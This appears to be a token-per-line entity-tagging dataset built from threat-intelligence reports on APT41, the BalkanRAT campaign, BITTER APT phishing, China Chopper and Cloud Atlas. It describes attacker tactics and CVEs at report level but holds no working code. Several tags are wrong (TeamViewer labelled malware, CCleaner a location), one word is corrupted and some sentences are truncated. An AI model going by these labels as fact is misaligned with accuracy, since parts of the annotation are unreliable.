+video B-IDTY
+game I-IDTY
+industry E-IDTY
+, O
+including O
+manipulating O
+virtual O
+currencies O
+. O
+In O
+a O
+highly O
+unusual O
+case O
+, O
+APT41 S-APT
+attempted O
+to O
+extort O
+a O
+game O
+company O
+by O
+deploying S-ACT
+the O
+Encryptor O
+RaaS O
+ransomware O
+. O
+APT41 S-APT
+is O
+well-known O
+for O
+leveraging S-ACT
+compromised O
+digital O
+certificates O
+from O
+video O
+game O
+studios O
+to O
+sign O
+malware O
+. O
+We O
+suggest O
+that O
+APT41 S-APT
+sought O
+to O
+target O
+in-game O
+currency O
+but O
+found O
+they O
+could O
+not O
+monetize O
+the O
+specific O
+targeted O
+game O
+, O
+so O
+the O
+group O
+resorted B-ACT
+to I-ACT
+ransomware E-ACT
+to O
+attempt O
+to O
+salvage O
+their O
+efforts O
+and O
+profit O
+from O
+the O
+compromise O
+. O
+APT41 S-APT
+has O
+also O
+used B-ACT
+credentials I-ACT
+compromised E-ACT
+in O
+previous O
+operations O
+. O
+In O
+2014 S-TIME
+, O
+APT41 S-APT
+compromised S-ACT
+an O
+online O
+billing/payment O
+service O
+using O
+VPN S-TOOL
+access O
+between O
+a O
+third-party O
+service B-IDTY
+provider E-IDTY
+and O
+the O
+targeted O
+payment S-IDTY
+service S-IDTY
+. O
+Although O
+we O
+do O
+not O
+have O
+first-hand O
+evidence O
+of O
+APT41's O
+compromise O
+of O
+TeamViewer S-MAL
+, O
+we O
+have O
+observed O
+APT41 S-APT
+use O
+compromised O
+TeamViewer O
+credentials O
+as O
+an O
+entry O
+point O
+at O
+multiple O
+organizations O
+. O
+Public O
+reports O
+of O
+supply O
+chain O
+compromises O
+linked O
+to O
+APT41 S-APT
+date O
+back O
+to O
+at O
+least O
+2014 S-TIME
+, O
+and O
+technical O
+evidence O
+associated O
+with O
+these O
+incidents O
+was O
+used O
+to O
+determine O
+a O
+relationship O
+, O
+if O
+any O
+, O
+with O
+APT41 S-APT
+. O
+As O
+demonstrated O
+in O
+operations O
+targeting O
+the O
+video O
+game O
+industry O
+, O
+APT41 S-APT
+leverages O
+a O
+variety B-MAL
+of I-MAL
+TTPs E-MAL
+to O
+access O
+production O
+environments O
+where O
+they O
+can O
+inject S-ACT
+malicious O
+code O
+into O
+legitimate O
+files O
+. O
+In O
+March B-TIME
+2017 E-TIME
+, O
+suspected O
+Chinese B-APT
+espionage I-APT
+operators E-APT
+targeted O
+CCleaner S-LOC
+, O
+a O
+utility O
+that O
+assists O
+in O
+the O
+removal O
+of O
+unwanted O
+files O
+from O
+a O
+computer O
+. O
+In O
+July S-TIME
+2017 S-TIME
+, O
+APT41 S-APT
+injected B-ACT
+malicious I-ACT
+code E-ACT
+into O
+a O
+software O
+update O
+package O
+maintained O
+by O
+Netsarang O
+and O
+signed O
+it O
+with O
+a O
+legitimate O
+Netsarang O
+certificate O
+in O
+an O
+operation O
+referred O
+to O
+as O
+ShadowPad O
+by O
+Kaspersky S-SECTEAM
+. O
+Both O
+APT41 S-APT
+and O
+the O
+actors O
+in O
+the O
+CCleaner S-LOC
+incident O
+used O
+TeamViewer S-MAL
+during O
+initial O
+compromise O
+. O
+Supply B-ACT
+chain I-ACT
+compromises E-ACT
+are O
+most O
+likely O
+an O
+extension O
+of O
+APT41's S-APT
+tactics O
+used O
+in O
+gaining O
+access O
+to O
+gaming O
+development O
+environments O
+and O
+to O
+other O
+gaming O
+organizations O
+via O
+third-party O
+service O
+providers O
+. O
+Beginning O
+in O
+July B-TIME
+2018 E-TIME
+, O
+APT41 S-APT
+appeared O
+to O
+have O
+directly O
+targeted O
+several O
+East O
+and O
+Southeast B-LOC
+Asia-based E-LOC
+video B-IDTY
+game I-IDTY
+developers E-IDTY
+and O
+distributors O
+to O
+inject O
+legitimate O
+executables O
+with O
+the O
+CRACKSHOT O
+backdoor O
+. O
+The O
+lure O
+used O
+to O
+target O
+the O
+cryptocurrency O
+exchange O
+(displayed O
+in O
+Figure O
+5 O
+and O
+translated O
+in O
+Figure O
+6) O
+referenced O
+an O
+online O
+gaming O
+platform O
+, O
+tying O
+the O
+cryptocurrency O
+targeting O
+to O
+APT41's S-APT
+focus O
+on O
+video B-IDTY
+game-related E-IDTY
+targeting O
+. O
+FireEye S-SECTEAM
+malware O
+analysis O
+identified O
+source O
+code O
+overlaps O
+between O
+malware O
+used O
+by O
+APT41 S-APT
+in O
+May B-TIME
+2016 E-TIME
+targeting O
+of O
+a O
+U.S.-based O
+game B-IDTY
+development E-IDTY
+studio O
+and O
+the O
+malware O
+observed O
+in O
+supply O
+chain O
+compromises O
+in O
+2017 S-TIME
+and O
+2018 S-TIME
+. O
+In O
+May B-TIME
+2016 E-TIME
+, O
+APT41 S-APT
+deployed O
+a O
+POISONPLUG O
+sample O
+at O
+a O
+U.S.-based O
+game O
+development O
+studio O
+. O
+Alternatively O
+, O
+it O
+is O
+also O
+possible O
+that O
+APT41 S-APT
+injected B-ACT
+malicious I-ACT
+code E-ACT
+into O
+the O
+package O
+prior O
+to O
+compilation O
+, O
+circumventing O
+the O
+need O
+to O
+steal O
+the O
+code-signing O
+certificate O
+and O
+compile O
+it O
+on O
+their O
+own O
+. O
+Either O
+APT41 S-APT
+is O
+operating O
+outside O
+of O
+state O
+control O
+but O
+still O
+working O
+with O
+other O
+Chinese O
+APT O
+malware O
+actors S-LOC
+, O
+tools O
+, O
+and O
+infrastructure O
+on O
+a O
+parttime O
+or O
+contractual O
+basis O
+, O
+or O
+APT41 S-APT
+is O
+a O
+full-time O
+. O
+APT41 S-APT
+uses O
+many O
+of O
+the O
+same O
+tools O
+and O
+compromised O
+digital B-MAL
+certificates E-MAL
+that O
+have O
+been O
+leveraged O
+by O
+other O
+Chinese O
+espionage O
+operators O
+. O
+Initial O
+reports O
+about O
+HIGHNOON S-FILE
+and O
+its O
+variants O
+reported O
+publicly O
+as O
+Winnti S-APT
+dating O
+back O
+to O
+at O
+least O
+2013 S-TIME
+indicated O
+the O
+tool O
+was O
+exclusive O
+to O
+a O
+single O
+group O
+, O
+contributing O
+to O
+significant O
+conflation O
+across O
+multiple O
+distinct O
+espionage O
+operations O
+. O
+APT41 S-APT
+has O
+used O
+several O
+malware O
+families O
+that O
+have O
+also O
+been O
+used O
+by O
+other O
+Chinese O
+espionage O
+operators O
+, O
+including O
+variants O
+of O
+HIGHNOON S-MAL
+, O
+HOMEUNIX S-MAL
+, O
+PHOTO S-MAL
+, O
+SOGU S-MAL
+, O
+and O
+ZXSHELL S-MAL
+, O
+among O
+others O
+. O
+HIGHNOON S-MAL
+, O
+one O
+of O
+the O
+main O
+code O
+families O
+observed O
+being O
+used O
+by O
+APT41 S-APT
+, O
+was O
+also O
+used O
+by O
+APT17 S-APT
+in O
+2015 O
+to O
+target O
+semiconductor S-IDTY
+and O
+chemical B-IDTY
+manufacturers E-IDTY
+. O
+HOMEUNIX S-MAL
+, O
+another O
+popular O
+backdoor S-MAL
+used O
+by O
+APT41 S-APT
+, O
+has O
+been O
+used O
+by O
+at O
+least O
+14 O
+separate O
+Chinese S-LOC
+espionage O
+groups S-APT
+, O
+including O
+APT1 S-APT
+, O
+APT10 S-APT
+, O
+APT17 S-APT
+, O
+APT18 S-APT
+, O
+and O
+APT20 S-APT
+. O
+APT41 S-APT
+has O
+used O
+CROSSWALK.BIN S-MAL
+, O
+a O
+kernel O
+driver O
+, O
+to O
+circumvent O
+firewalls O
+and O
+covertly O
+send O
+data O
+. O
+Another O
+Chinese O
+espionage S-ACT
+group O
+used O
+a O
+similar O
+tool O
+, O
+CLASSFON S-MAL
+, O
+to O
+covertly O
+proxy O
+network O
+communications O
+in O
+2011 S-TIME
+. O
+At O
+least O
+two O
+of O
+these O
+malware O
+families O
+, O
+HIGHNOON.CLI S-MAL
+and O
+GEARSHIFT S-MAL
+, O
+have O
+been O
+used O
+by O
+APT17 S-APT
+and O
+another O
+suspected O
+Chinese O
+espionage O
+group O
+. O
+APT41 S-APT
+regularly O
+leverages S-ACT
+code-signing B-MAL
+certificates E-MAL
+to O
+sign O
+malware O
+when O
+targeting O
+both O
+gaming O
+and O
+nongaming B-IDTY
+organizations E-IDTY
+. O
+In O
+July B-TIME
+2017 E-TIME
+, O
+APT41 S-APT
+initiated O
+a O
+TeamViewer O
+session O
+and O
+transferred O
+files O
+that O
+were O
+later O
+deleted O
+. O
+In O
+these O
+instances O
+, O
+APT41 S-APT
+leveraged O
+TeamViewer S-MAL
+to O
+transfer O
+malware O
+into O
+the O
+compromised O
+environment O
+, O
+although O
+we O
+do O
+not O
+have O
+direct O
+evidence O
+of O
+APT41 S-APT
+compromising O
+TeamViewer O
+. O
+In O
+May B-TIME
+2018 E-TIME
+, O
+APT41 S-APT
+used O
+TeamViewer S-MAL
+for O
+initial O
+entry O
+in O
+the O
+compromise O
+of O
+a O
+healthcare S-IDTY
+company S-IDTY
+. O
+Notably O
+, O
+APT41 S-APT
+was O
+observed O
+using B-ACT
+proof-of-concept E-ACT
+exploit S-VULNAME
+code O
+for O
+CVE-2019-3396 S-VULID
+within O
+23 O
+days O
+after O
+the O
+Confluence O
+. O
+APT41 S-APT
+has O
+targeted O
+payment B-IDTY
+services E-IDTY
+specializing O
+in O
+handling O
+in-game O
+transactions O
+and O
+real O
+money O
+transfer O
+(RMT) O
+purchases O
+. O
+
+The O
+group O
+will O
+also O
+use B-ACT
+a I-ACT
+compromised I-ACT
+account E-ACT
+to O
+create O
+scheduled O
+tasks O
+on O
+systems O
+or O
+modify S-ACT
+legitimate O
+Windows S-OS
+services O
+to O
+install O
+the O
+HIGHNOON S-MAL
+and O
+SOGU B-MAL
+backdoors E-MAL
+. O
+APT41 S-APT
+uses O
+multiple O
+methods O
+to O
+perform O
+lateral O
+movement O
+in O
+an O
+environment O
+, O
+including O
+RDP B-ACT
+sessions E-ACT
+, O
+using B-ACT
+stolen I-ACT
+credentials E-ACT
+, O
+adding B-ACT
+accounts E-ACT
+to O
+User O
+and O
+Admin O
+groups O
+, O
+and O
+password B-ACT
+brute-forcing I-ACT
+utilities E-ACT
+. O
+To O
+maintain O
+presence O
+, O
+APT41 S-APT
+relies O
+on O
+backdoors O
+, O
+a O
+Sticky B-MAL
+Keys E-MAL
+vulnerability O
+, O
+scheduled B-MAL
+tasks E-MAL
+, O
+bootkits S-MAL
+, O
+rootkits S-MAL
+, O
+registry B-MAL
+modifications E-MAL
+, O
+and O
+creating O
+or O
+modifying O
+startup O
+files O
+. O
+APT41 S-APT
+leveraged O
+ROCKBOOT S-MAL
+as O
+a O
+persistence O
+mechanism O
+for O
+PHOTO O
+and O
+TERA O
+backdoors O
+. O
+APT41 S-APT
+has O
+also O
+been O
+observed O
+modifying B-ACT
+firewall I-ACT
+rules E-ACT
+to O
+enable O
+file O
+and O
+printer O
+sharing O
+to O
+allow O
+for O
+inbound O
+Server B-TOOL
+Message I-TOOL
+Block E-TOOL
+(SMB) S-TOOL
+traffic O
+. O
+
+In O
+some O
+instances O
+, O
+APT41 S-APT
+leveraged O
+POISONPLUG S-MAL
+as O
+a O
+first-stage O
+backdoor O
+to O
+deploy O
+the O
+HIGHNOON B-MAL
+backdoor E-MAL
+in O
+the O
+targeted O
+environment O
+. O
+The O
+group O
+also O
+deploys S-ACT
+the O
+SOGU O
+and O
+CROSSWALK O
+malware O
+families O
+as O
+means O
+to O
+maintain O
+presence O
+. O
+APT41 S-APT
+sent O
+spear-phishing S-ACT
+emails S-TOOL
+to O
+multiple O
+HR O
+employees O
+three O
+days O
+after O
+the O
+compromise O
+had O
+been O
+remediated O
+and O
+systems O
+were O
+brought O
+back O
+online O
+. O
+APT41 S-APT
+also O
+deploys O
+the O
+SOGU S-MAL
+and O
+CROSSWALK S-MAL
+malware O
+families O
+as O
+means O
+to O
+maintain O
+presence O
+. O
+Within O
+hours O
+of O
+a O
+user O
+opening O
+the O
+malicious O
+attachment O
+dropping O
+a O
+HOMEUNIX B-MAL
+backdoor E-MAL
+, O
+APT41 S-APT
+regained O
+a O
+foothold O
+within O
+the O
+environment O
+by O
+installing O
+PHOTO S-MAL
+on O
+the O
+organization's O
+servers O
+across O
+multiple O
+geographic O
+regions O
+. O
+Before O
+attempting O
+to O
+deploy O
+the O
+publicly O
+available O
+Ransomware-as-a-Service O
+(RaaS) O
+Encryptor O
+RaaS O
+through O
+group O
+policy O
+, O
+APT41 S-APT
+blocked O
+victim O
+systems O
+from O
+retrieving O
+anti-virus O
+updates O
+by O
+accessing S-ACT
+the O
+DNS S-PROT
+management O
+console O
+and O
+implementing O
+a O
+forward O
+lookup O
+on O
+the O
+domain O
+used O
+for O
+anti-virus O
+updates O
+to O
+the O
+park O
+IP S-PROT
+address O
+1.1.1.1 O
+. O
+APT41 S-APT
+has O
+been O
+observed O
+creating S-ACT
+a O
+RAR O
+archive O
+of O
+targeted O
+files O
+for O
+Exfiltration S-ACT
+. O
+APT41 S-APT
+is O
+unique O
+among O
+tracked O
+China-based O
+actors S-LOC
+in O
+that O
+it O
+leverages S-ACT
+non-public O
+malware O
+typically O
+reserved O
+for O
+espionage O
+campaigns O
+in O
+what O
+appears O
+to O
+be O
+activity O
+for O
+personal O
+gain O
+. O
+During O
+multiple O
+engagements O
+, O
+APT41 S-APT
+attempted O
+to O
+remove O
+evidence O
+of O
+some O
+of O
+its O
+activity O
+by O
+deleting B-ACT
+Bash I-ACT
+histories E-ACT
+, O
+clearing B-ACT
+Windows I-ACT
+security E-ACT
+and O
+system O
+events O
+, O
+and O
+modifying B-ACT
+DNS I-ACT
+management E-ACT
+to O
+avoid B-ACT
+anti-virus I-ACT
+detections E-ACT
+. O
+Explicit O
+financially-motivated O
+targeting O
+is O
+unusual O
+among O
+Chinese B-LOC
+statesponsored E-LOC
+threat O
+groups O
+, O
+and O
+evidence O
+suggests O
+APT41 S-APT
+has O
+conducted O
+simultaneous O
+cyber O
+crime O
+and O
+Cyber B-ACT
+Espionage E-ACT
+operations O
+from O
+2014 S-TIME
+onward O
+. O
+APT41 S-APT
+operations O
+against O
+higher B-IDTY
+education E-IDTY
+, O
+travel B-IDTY
+services E-IDTY
+, O
+and O
+news/media B-IDTY
+firms E-IDTY
+provide O
+some O
+indication O
+that O
+the O
+group O
+also O
+tracks O
+individuals O
+and O
+conducts O
+surveillance O
+. O
+For O
+example O
+, O
+the O
+group O
+has O
+repeatedly O
+targeted O
+call O
+record O
+information O
+at O
+telecom S-IDTY
+companies S-IDTY
+. O
+APT41 S-APT
+has O
+established O
+and O
+maintained O
+strategic O
+access O
+to O
+organizations O
+in O
+the O
+healthcare S-IDTY
+, O
+high-tech S-IDTY
+, O
+and O
+telecommunications S-IDTY
+sectors S-IDTY
+. O
+The O
+group’s O
+financially O
+motivated O
+activity O
+has O
+primarily O
+focused O
+on O
+the O
+video B-IDTY
+game I-IDTY
+industry E-IDTY
+, O
+where O
+APT41 S-APT
+has O
+manipulated S-ACT
+virtual O
+currencies O
+and O
+even O
+attempted O
+to O
+deploy S-ACT
+ransomware S-ACT
+. O
+In O
+another O
+instance O
+, O
+APT41 S-APT
+targeted O
+a O
+hotel’s O
+reservation O
+systems O
+ahead O
+of O
+Chinese O
+officials O
+staying O
+there O
+, O
+suggesting O
+the O
+group O
+was O
+tasked O
+to O
+reconnoiter O
+the O
+facility O
+for O
+security O
+reasons O
+. O
+These O
+supply B-ACT
+chain E-ACT
+compromise O
+tactics O
+have O
+also O
+been O
+characteristic O
+of O
+APT41’s S-APT
+best O
+known O
+and O
+most O
+recent O
+espionage O
+campaigns O
+. O
+Interestingly O
+, O
+despite O
+the O
+significant O
+effort O
+required O
+to O
+execute O
+supply O
+chain O
+compromises O
+and O
+the O
+large O
+number O
+of O
+affected O
+organizations O
+, O
+APT41 S-APT
+limits S-ACT
+the O
+deployment O
+of O
+follow-on O
+malware O
+to O
+specific O
+victim O
+systems O
+by O
+matching S-ACT
+against O
+individual O
+system O
+identifiers O
+. O
+Mapping O
+the O
+group’s O
+activities O
+since O
+2012 O
+(Figure O
+2) O
+also O
+provides O
+some O
+indication O
+that O
+APT41 S-APT
+primarily O
+conducts S-ACT
+financially O
+motivated O
+operations O
+outside O
+of O
+their O
+normal O
+day O
+jobs O
+. O
+The O
+latter O
+is O
+especially O
+notable O
+because O
+APT41 S-APT
+has O
+repeatedly O
+returned O
+to O
+targeting O
+the O
+video B-IDTY
+game I-IDTY
+industry E-IDTY
+and O
+we O
+believe O
+these O
+activities O
+were O
+formative O
+in O
+the O
+group’s O
+later O
+espionage O
+operations O
+. O
+APT41 S-APT
+leverages O
+an O
+arsenal O
+of O
+over O
+46 O
+different O
+malware B-MAL
+families E-MAL
+and O
+tools S-MAL
+to O
+accomplish O
+their O
+missions O
+, O
+including O
+publicly O
+available O
+utilities O
+, O
+malware O
+shared O
+with O
+other O
+Chinese O
+espionage O
+operations O
+, O
+and O
+tools O
+unique O
+to O
+the O
+group O
+. O
+Once O
+in O
+a O
+victim O
+organization O
+, O
+APT41 S-APT
+can O
+leverage S-ACT
+more O
+sophisticated O
+TTPs O
+and O
+deploy B-ACT
+additional I-ACT
+malware E-ACT
+. O
+APT41 S-APT
+often O
+relies O
+on O
+spear-phishing S-ACT
+emails S-TOOL
+with O
+attachments O
+such O
+as O
+compiled O
+HTML S-TOOL
+( O
+.chm S-FILE
+) O
+files O
+to O
+initially O
+compromise O
+their O
+victims O
+. O
+
+APT41 S-APT
+has O
+also O
+deployed B-ACT
+rootkits E-ACT
+and O
+Master B-TOOL
+Boot I-TOOL
+Record E-TOOL
+(MBR) S-TOOL
+bootkits O
+on O
+a O
+limited O
+basis O
+to O
+hide O
+their O
+malware O
+and O
+maintain O
+persistence O
+on O
+select O
+victim O
+systems O
+. O
+The O
+limited O
+use O
+of O
+these O
+tools O
+by O
+APT41 S-APT
+suggests O
+the O
+group O
+reserves O
+more O
+advanced O
+TTPs O
+and O
+malware O
+only O
+for O
+high-value O
+targets O
+. O
+Like O
+other O
+Chinese O
+espionage O
+operators O
+, O
+APT41 S-APT
+appears O
+to O
+have O
+moved O
+toward O
+strategic O
+intelligence O
+collection O
+and O
+establishing O
+access O
+and O
+aACT O
+from O
+direct O
+intellectual O
+property O
+theft O
+since O
+2015 S-TIME
+. O
+This O
+shift O
+, O
+however O
+, O
+has O
+not O
+affected O
+the O
+group's S-APT
+consistent O
+interest O
+in O
+targeting O
+the O
+video B-IDTY
+game I-IDTY
+industry E-IDTY
+for O
+financially O
+motivated O
+reasons O
+. O
+BalkanRAT S-FILE
+enables O
+the O
+attacker O
+to O
+remotely O
+control O
+the O
+compromised O
+computer O
+via O
+a O
+graphical O
+interface O
+, O
+i.e. O
+, O
+manually; O
+BalkanDoor S-FILE
+enables O
+them O
+to O
+remotely O
+control O
+the O
+compromised O
+computer O
+via O
+a O
+command O
+line O
+, O
+i.e. O
+, O
+possibly O
+en O
+masse O
+. O
+With O
+the O
+contents O
+of O
+the O
+emails S-TOOL
+, O
+included O
+links O
+and O
+decoy O
+PDFs O
+all O
+involving O
+taxes O
+, O
+the O
+attackers S-APT
+are O
+apparently O
+targeting O
+the O
+financial S-IDTY
+departments O
+of O
+organizations O
+in O
+the O
+Balkans S-LOC
+region O
+. O
+Some O
+parts O
+of O
+the O
+campaign O
+were O
+briefly O
+described O
+by O
+a O
+Serbian B-SECTEAM
+security E-SECTEAM
+provider O
+in O
+2016 S-TIME
+and O
+the O
+Croatian O
+CERT O
+in O
+2017 S-TIME
+. O
+The O
+campaign O
+has O
+been O
+active O
+at O
+least O
+from O
+January S-TIME
+2016 S-TIME
+to O
+the O
+time O
+of O
+writing O
+the O
+most O
+recent O
+detections O
+in O
+our O
+telemetry O
+are O
+from O
+July O
+2019 S-TIME
+. O
+Our O
+findings O
+show O
+that O
+the O
+mentioned O
+attacks S-APT
+have O
+been O
+orchestrated O
+and O
+we O
+consider O
+them O
+a O
+single O
+long-term O
+campaign O
+that O
+spans O
+Croatia S-LOC
+, O
+Serbia S-LOC
+, O
+Montenegro S-LOC
+, O
+and O
+Bosnia S-LOC
+and O
+Herzegovina S-LOC
+. O
+We’ve O
+discovered O
+a O
+new O
+version O
+of O
+BalkanDoor S-APT
+with O
+a O
+new O
+method O
+for O
+execution/installation: O
+an O
+exploit S-VULNAME
+of O
+the O
+WinRAR S-TOOL
+ACE O
+vulnerability O
+CVE-2018-20250 S-VULID
+. O
+Both O
+BalkanRAT S-FILE
+and O
+BalkanDoor S-FILE
+spread O
+in O
+Croatia S-LOC
+, O
+Serbia S-LOC
+, O
+Montenegro S-LOC
+, O
+and O
+Bosnia S-LOC
+and O
+Herzegovina S-LOC
+. O
+According O
+to O
+our O
+telemetry O
+, O
+the O
+campaign O
+spreading O
+these O
+tools O
+has O
+been O
+live O
+since O
+2016 S-TIME
+, O
+with O
+the O
+most O
+recent O
+detections O
+as O
+late O
+as O
+in O
+July B-TIME
+2019 E-TIME
+. O
+In O
+some O
+of O
+the O
+latest O
+samples O
+of O
+BalkanDoor S-FILE
+detected O
+in O
+2019 S-TIME
+, O
+the O
+malware O
+is O
+distributed O
+as O
+an O
+ACE O
+archive O
+, O
+disguised O
+as O
+a O
+RAR O
+archive O
+(i.e. O
+, O
+not O
+an O
+executable O
+file) O
+, O
+specially O
+crafted O
+to O
+exploit S-VULNAME
+the O
+WinRAR S-TOOL
+ACE O
+vulnerability O
+CVE-2018-20250 S-VULID
+. O
+Via O
+the O
+BalkanDoor O
+backdoor O
+, O
+the O
+attacker S-APT
+sends O
+a O
+backdoor O
+command O
+to O
+unlock O
+the O
+screen… O
+and O
+using O
+BalkanRAT S-MAL
+, O
+they O
+can O
+do O
+whatever O
+they O
+want O
+on O
+the O
+computer O
+. O
+The O
+BalkanDoor B-MAL
+backdoor E-MAL
+does O
+not O
+implement O
+any O
+Exfiltration S-ACT
+channel O
+. O
+APT41 S-APT
+leveraged O
+ADORE.XSEC S-MAL
+, O
+a O
+Linux S-OS
+backdoor O
+launched O
+by O
+the O
+Adore-NG O
+rootkit O
+, O
+throughout O
+an O
+organization's O
+Linux S-OS
+environment O
+. O
+The O
+backdoor S-FILE
+can O
+connect O
+to O
+any O
+of O
+the O
+C&Cs O
+from O
+a O
+hardcoded O
+list O
+– O
+a O
+measure O
+to O
+increase O
+resilience O
+. O
+The O
+main O
+part O
+of O
+the O
+BalkanRAT B-FILE
+malware E-FILE
+is O
+a O
+copy O
+of O
+the O
+Remote O
+Utilities O
+software O
+for O
+remote B-ACT
+access E-ACT
+. O
+Interestingly O
+, O
+some O
+of O
+the O
+APT41's S-APT
+POISONPLUG S-MAL
+malware O
+samples O
+leverage O
+the O
+Steam O
+Community O
+website O
+associated O
+with O
+Valve O
+, O
+a O
+video O
+game O
+developer O
+and O
+publisher O
+. O
+The O
+campaign O
+targeting O
+accountants O
+in O
+the O
+Balkans O
+shows O
+some O
+similarities O
+with O
+a O
+campaign O
+aimed O
+at O
+Ukrainian S-LOC
+notaries O
+reported O
+in O
+2016 S-TIME
+. O
+Based O
+on O
+the O
+Let’s O
+Encrypt S-SECTEAM
+certificate O
+issuance O
+date O
+, O
+we O
+believe O
+this O
+campaign O
+to O
+be O
+active O
+from O
+May B-TIME
+2019 E-TIME
+. O
+One O
+of O
+the O
+domains O
+uncovered O
+during O
+the O
+investigation O
+was O
+identified O
+by O
+the O
+Chinese O
+security O
+vendor O
+CERT B-SECTEAM
+360 E-SECTEAM
+as O
+being O
+part O
+of O
+the O
+BITTER B-APT
+APT E-APT
+campaign O
+in O
+May B-TIME
+2019 E-TIME
+. O
+Further O
+analysis O
+of O
+the O
+BITTER B-APT
+APT’s E-APT
+infrastructure O
+uncovered O
+a O
+broader O
+phishing E-ACT
+campaign O
+targeting O
+other O
+government B-IDTY
+sites E-IDTY
+and O
+state-owned O
+enterprises S-IDTY
+in O
+China S-LOC
+. O
+Further O
+investigation O
+revealed O
+approximately O
+40 O
+additional O
+sites O
+, O
+all O
+of O
+which O
+appear O
+to O
+be O
+targeting O
+the O
+government S-IDTY
+of O
+China S-LOC
+and O
+other O
+organisations S-IDTY
+in O
+China S-LOC
+. O
+We O
+expect O
+to O
+see O
+BITTER B-APT
+APT E-APT
+continuing O
+to O
+target O
+the O
+government S-IDTY
+of O
+China S-LOC
+by O
+employing O
+spoofed O
+login O
+pages O
+designed O
+to O
+steal O
+user O
+credentials O
+and O
+obtain O
+access O
+to O
+privileged O
+account O
+information O
+. O
+This O
+domain O
+and O
+IP S-PROT
+address O
+has O
+been O
+previously O
+associated O
+with O
+the O
+BITTER B-APT
+APT E-APT
+and O
+targeting O
+government B-IDTY
+agencies E-IDTY
+in O
+China S-LOC
+with O
+phishing B-ACT
+attacks E-ACT
+, O
+based O
+on O
+reporting O
+from O
+360-CERT S-SECTEAM
+. O
+At O
+the O
+time O
+of O
+analysis O
+, O
+the O
+subdomains O
+did O
+not O
+host O
+a O
+website; O
+however O
+, O
+based O
+on O
+BITTER B-APT
+APT E-APT
+group’s O
+targeting O
+patterns O
+, O
+it O
+is O
+highly O
+likely O
+that O
+they O
+were O
+created O
+to O
+host O
+faux O
+login O
+phishing E-ACT
+pages O
+designed O
+to O
+steal O
+user’s O
+credentials O
+. O
+BITTER B-APT
+APT E-APT
+campaigns O
+are O
+primarily O
+targeting O
+China S-LOC
+, O
+Pakistan S-LOC
+and O
+Saudi B-LOC
+Arabia E-LOC
+historically O
+. O
+As O
+part O
+of O
+its O
+ongoing O
+research O
+initiatives O
+, O
+the O
+Anomali S-SECTEAM
+Threat O
+Research O
+Team O
+has O
+discovered O
+a O
+new O
+phishing S-ACT
+attack O
+leveraging O
+spoof O
+sites O
+that O
+seem O
+to O
+be O
+designed O
+to O
+steal O
+email S-TOOL
+credentials O
+from O
+the O
+target O
+victims O
+within O
+the O
+government O
+of O
+the O
+People’s O
+Republic O
+of O
+China S-LOC
+. O
+360 B-SECTEAM
+Threat I-SECTEAM
+Intelligence I-SECTEAM
+Center E-SECTEAM
+has O
+reported O
+on O
+related O
+indicators O
+being O
+attributed O
+to O
+BITTER B-APT
+APT E-APT
+a O
+South B-LOC
+Asian E-LOC
+country O
+suspected O
+Indian O
+APT O
+in O
+open O
+source O
+reporting O
+. O
+China B-MAL
+Chopper E-MAL
+is O
+a O
+tool O
+that O
+has O
+been O
+used O
+by O
+some O
+state-sponsored O
+actors O
+such O
+as O
+Leviathan S-APT
+and O
+Threat B-APT
+Group-3390 E-APT
+, O
+but O
+during O
+our O
+investigation O
+we've O
+seen O
+actors O
+with O
+varying O
+skill O
+levels O
+. O
+China B-FILE
+Chopper E-FILE
+is O
+a O
+tool O
+that O
+allows O
+attackers S-APT
+to O
+remotely O
+control O
+the O
+target O
+system O
+that O
+needs O
+to O
+be O
+running O
+a O
+web O
+server O
+application O
+before O
+it O
+can O
+be O
+targeted O
+by O
+the O
+tool O
+. O
+Cisco B-SECTEAM
+Talos E-SECTEAM
+discovered O
+significant O
+China B-MAL
+Chopper E-MAL
+activity O
+over O
+a O
+two-year O
+period O
+beginning O
+in O
+June B-TIME
+2017 E-TIME
+, O
+which O
+shows O
+that O
+even O
+nine O
+years O
+after O
+its O
+creation O
+, O
+attackers S-APT
+are O
+using O
+China B-MAL
+Chopper E-MAL
+without O
+significant O
+modifications O
+. O
+Here O
+, O
+we O
+investigate O
+a O
+campaign O
+targeting O
+an O
+Asian S-LOC
+government B-IDTY
+organization E-IDTY
+. O
+We O
+observed O
+another O
+campaign O
+targeting O
+an O
+organisation O
+located O
+in O
+Lebanon S-LOC
+. O
+China B-FILE
+Chopper E-FILE
+contains O
+a O
+remote O
+shell O
+( O
+Virtual B-TOOL
+Terminal E-TOOL
+) O
+function O
+that O
+has O
+a O
+first O
+suggested O
+command O
+of O
+netstat O
+an|find O
+ESTABLISHED O
+. O
+They O
+download O
+and O
+install O
+an O
+archive O
+containing O
+executables O
+and O
+trivially O
+modified O
+source O
+code O
+of O
+the O
+password-stealing O
+tool O
+Mimikatz B-FILE
+Lite E-FILE
+as O
+GetPassword.exe S-FILE
+. O
+The O
+tool S-FILE
+investigates O
+the O
+Local O
+Security O
+Authority O
+Subsystem O
+memory O
+space O
+in O
+order O
+to O
+find O
+, O
+decrypt O
+and O
+display O
+retrieved O
+passwords O
+. O
+The O
+actor S-APT
+attempts O
+to O
+exploit S-VULNAME
+CVE-2018–8440 S-VULID
+— O
+an O
+elevation O
+of O
+privilege O
+vulnerability S-VULNAME
+in O
+Windows S-OS
+when O
+it O
+improperly O
+handles O
+calls O
+to O
+Advanced O
+Local O
+Procedure O
+Call O
+— O
+to O
+elevate O
+the O
+privileges O
+using O
+a O
+modified O
+proof-of-concept S-VULNAME
+exploit S-VULNAME
+. O
+The O
+attacker S-APT
+obtains O
+the O
+required O
+privileges O
+and O
+launches O
+a O
+few O
+other O
+tools O
+to O
+modify S-ACT
+the O
+access O
+control O
+lists O
+(ACLs) O
+of O
+all O
+websites O
+running O
+on O
+the O
+affected O
+server O
+. O
+The O
+Windows S-OS
+branch O
+of O
+the O
+Cloud B-APT
+Atlas E-APT
+intrusion O
+set O
+still O
+uses O
+spear-phishing S-ACT
+emails S-TOOL
+to O
+target O
+high O
+profile O
+victims O
+. O
+From O
+the O
+beginning O
+of O
+2019 O
+until O
+July O
+, O
+we O
+have O
+been O
+able O
+to O
+identify O
+different O
+spear-phishing S-ACT
+campaigns S-ACT
+related O
+to O
+this O
+threat O
+actor O
+mostly O
+focused O
+on O
+Russia S-LOC
+, O
+Central B-LOC
+Asia E-LOC
+and O
+regions O
+of O
+Ukraine S-LOC
+with O
+ongoing O
+military O
+conflicts O
+. O
+We O
+described O
+one O
+of O
+the O
+techniques O
+used O
+by O
+Cloud B-APT
+Atlas E-APT
+in O
+2017 S-TIME
+and O
+our O
+colleagues O
+at O
+Palo B-SECTEAM
+Alto E-SECTEAM
